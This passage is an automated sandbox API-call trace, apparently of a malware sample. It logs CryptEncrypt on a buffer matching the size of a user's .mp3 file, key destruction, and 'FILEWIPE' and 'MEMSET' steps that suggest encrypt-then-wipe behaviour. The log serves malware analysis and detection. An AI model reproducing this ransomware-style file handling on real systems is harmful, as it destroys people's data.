wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.677] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9656f8*, pdwDataLen=0x6ae220*=0x1836a, dwBufLen=0x18370 | out: pbData=0x9656f8*, pdwDataLen=0x6ae220*=0x18370) returned 1 [0037.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.681] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.681] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.681] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.681] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.681] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.681] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.681] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.681] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.682] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.695] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.695] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.695] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.695] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.695] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.695] CryptDestroyKey (hKey=0x7c2280) returned 1 [0037.695] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.696] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.696] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.696] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.696] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.696] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.696] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.696] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.696] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.696] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.696] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.696] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.697] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.697] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.697] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.697] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.697] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.698] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.698] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.698] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.698] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.699] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.700] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.700] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.700] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0xb331b1b0, ftLastWriteTime.dwHighDateTime=0x1d5b923, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0x7c2240 [0037.700] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.700] CharLowerBuffW (in: lpsz="byte[99178]", cchLength=0xb | out: lpsz="byte[99178]") returned 0xb [0037.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.700] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.700] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.700] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.700] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.701] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.702] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.702] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 